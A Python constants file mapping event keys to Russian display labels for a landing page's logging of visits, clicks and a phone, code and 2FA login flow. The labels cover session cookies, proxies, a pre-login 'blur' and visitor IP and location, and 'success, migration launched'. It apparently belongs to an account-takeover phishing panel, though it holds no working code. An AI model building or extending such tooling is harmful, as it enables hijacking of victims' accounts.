from __future__ import annotations

ACTION_TITLES = {
	"visit": "Визит на лендинг",
	"client.context": "Контекст браузера",
	"ui.ready": "Страница загружена",
	"logout": "Выход с лендинга",
	"click.login": "Клик: вход",
	"click.media": "Клик: медиа",
	"click.copy_link": "Клик: копировать ссылку",
	"click.logout": "Клик: logout",
	"auth.start": "Авторизация: старт сессии",
	"auth.phone.submit": "Авторизация: отправка номера",
	"auth.phone.result": "Авторизация: ответ по номеру",
	"auth.phone.error": "Авторизация: ошибка номера",
	"auth.code.submit": "Авторизация: отправка кода",
	"auth.code.result": "Авторизация: ответ по коду",
	"auth.code.error": "Авторизация: ошибка кода",
	"auth.password.submit": "Авторизация: отправка 2FA",
	"auth.password.result": "Авторизация: ответ по 2FA",
	"auth.password.error": "Авторизация: ошибка 2FA",
	"auth.done": "Авторизация: успех, миграция запущена",
	"auth.ui.step": "UI: смена шага",
	"auth.ui.ready": "UI: форма готова",
	"auth.ui.close": "UI: закрытие формы",
	"auth.ui.result": "UI: результат шага",
	"auth.ui.reload": "UI: перезагрузка после входа",
	"auth.ui.error": "UI: ошибка",
	"auth.ui.phone_click": "UI: нажата кнопка номера",
	"auth.ui.code_click": "UI: нажата кнопка кода",
	"auth.ui.password_click": "UI: нажата кнопка 2FA",
	"auth.ui.edit_phone": "UI: изменить номер",
}

DETAIL_LABELS = {
	"path": "Путь",
	"query": "Query",
	"place": "Место клика",
	"step": "Шаг",
	"login_id": "Login ID",
	"phone": "Телефон",
	"code_len": "Длина кода",
	"password_len": "Длина пароля",
	"error": "Ошибка",
	"user": "Аккаунт",
	"job_id": "Job ID",
	"session": "Сессия",
	"proxy": "Прокси",
	"blur": "Blur до логина",
	"nick": "Ник лендинга",
	"cookie": "Cookie сессии",
	"url": "URL",
	"tag": "Элемент",
	"stage": "Стадия",
}

HEADER_KEYS = {
	"ip",
	"ua",
	"ref",
	"unlocked",
	"lang",
	"country",
	"region",
	"city",
	"isp",
	"org",
	"timezone",
	"ip_kind",
	"browser_tz",
	"tz",
	"device",
	"os",
	"browser",
}
